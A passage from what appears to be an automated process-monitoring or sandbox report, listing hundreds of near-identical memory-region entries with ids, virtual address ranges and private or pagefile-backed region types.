"private_0x0000000002240000" filename = "" Region: id = 7892 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7893 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7894 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7895 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7896 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7897 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7898 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7899 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7900 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7901 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7902 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7903 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7904 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7905 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7906 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7907 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7908 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7909 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7910 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7911 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7912 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7913 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7914 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7915 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7916 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7917 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7918 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7919 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7920 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7921 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7922 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7923 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7924 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7925 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7926 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7927 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7928 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7929 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7930 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7931 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7932 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7933 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7934 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7935 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7936 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7937 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7938 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7939 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7940 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7941 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7942 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7943 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7944 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7945 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7946 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7947 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7948 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7949 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7950 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7951 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7952 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7953 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7954 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7955 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7956 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7957 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7958 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7959 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7960 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7961 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7962 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7963 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7964 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7965 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7966 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7967 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7968 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7969 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7970 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7971 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7972 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7973 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7974 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7975 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7976 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7977 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7978 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7979 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7980 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7981 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7982 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7983 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7984 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7985 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7986 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7987 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7988 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7989 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7990 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7991 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7992 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7993 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7994 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7995 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7996 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7997 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7998 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7999 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8000 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8001 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8002 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8003 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8004 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8005 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8006 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8007 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8008 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8009 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8010 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8011 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8012 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8013 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8014 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8015 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8016 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8017 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8018 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8019 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8020 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8021 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8022 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8023 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8024 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8025 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8026 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8027 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8028 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8029 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8030 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8031 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8032 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8033 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8034 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8035 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8036 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8037 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8038 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8039 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8040 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8041 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8042 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8043 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8044 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8045 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8046 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8047 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8048 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8049 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8050 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8051 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8052 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8053 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8054 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8055 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8056 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8058 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8059 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8060 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8062 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8063 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8064 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8066 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8067 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8068 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8069 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8070 start_va = 0x9bc0000 end_va = 0xa0b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bc0000" filename = "" Region: id = 8071 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8072 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8073 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8074 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8075 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8076 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8077 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8078 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8079 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8080 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8081 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8082 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8083 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8084 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8085 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8086 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8087 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 8088 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8089 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 8090 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 